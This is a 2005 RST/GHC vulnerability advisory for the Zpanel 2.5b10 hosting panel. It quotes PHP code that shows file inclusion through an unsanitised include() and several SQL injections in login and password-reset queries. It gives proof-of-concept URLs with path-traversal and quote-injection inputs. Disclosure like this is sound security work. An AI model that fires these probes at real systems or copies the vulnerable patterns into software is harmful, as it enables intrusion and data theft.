# # # # # # # # # # # # # ## #### ## # ## ## ###### ## ## ## ## ###### ## ## ## ## #### ## ## ### ############ ### ######################## ############## ######## ########## ####### ### ## ########## ## ### ### ## ########## ## ### ### # ########## # ### ### ## ######## ## ### ## # ###### # ## ## # #### # ## ## ## RST/GHC advisory # 26 --------------------------------------------------------------------------------------------------------------------------- PRODUCT : Zpanel VERSION : 2.5b10 VENDOR : Zee-Way Services http://www.zee-way.com , http://www.thezpanel.com --------------------------------------------------------------------------------------------------------------------------- FILE: exe_zpanel.php VULN: PHP code injection CODE: 22: if (!isset($_GET['page'])){ 23: $body = "main.php"; 24: }else{ 25: if (!isset($_GET['ext']) || $_GET['ext'] == ''){ 26: if ($_GET['page'] == "main") { 27: $body = "main.php"; 28: }else{ 29: $body = "modules/" . $_GET['page'] . "/index.php"; 30: } 31: }else{ 32: $body = "modules/" . $_GET['page'] . "/" . $_GET['ext'] . ".php"; 33: } 34: } ... 53: include ($body); INFO: http://host/zpanel/exe_zpanel.php?page=../../../../../blah http://host/zpanel/exe_zpanel.php?page=../../../../../blah&ext=blah --------------------------------------------------------------------------------------------------------------------------- FILE: exe_login.php VULN: SQL injection CODE: 5: if (isset($_GET['query'])) { 6: 7: if ($_GET['query'] == 'login'){ ... 
15: $query_Recordset1 = sprintf("SELECT * FROM custumerbase WHERE servicename = '".$_GET['uname']."'", $colname_Recordset1); INFO: if magic_quotes = Off http://host/zpanel/exe_login.php?query=login&uname=' --------------------------------------------------------------------------------------------------------------------------- FILE: zpanel.php VULN: SQL injection CODE: 98: if (isset($_GET['passrequest'])) { 99: if (isset($_GET['user']) && isset($_GET['code']) && ($_GET['code'] != '')) { 100: mysql_select_db($database_Customer_Database, $Customer_Database); 101: $query_TempUser = sprintf("SELECT * FROM custumerbase WHERE servicename = '".$_GET['user']."'"); INFO: if magic_quotes = Off http://host/zpanel/?passrequest&code=blah&user=' --------------------------------------------------------------------------------------------------------------------------- FILE: zpanel.php VULN: SQL injection CODE: 98: if (isset($_GET['passrequest'])) { ... 117: if (isset($_POST['email'])) { 118: mysql_select_db($database_Customer_Database, $Customer_Database); 119: $query_TempUser = sprintf("SELECT * FROM custumerbase WHERE email = '".$_POST['email']."'"); --------------------------------------------------------------------------------------------------------------------------- 1dt.w0lf RST/GHC http://rst.void.ru http://ghc.ru 28.04.2005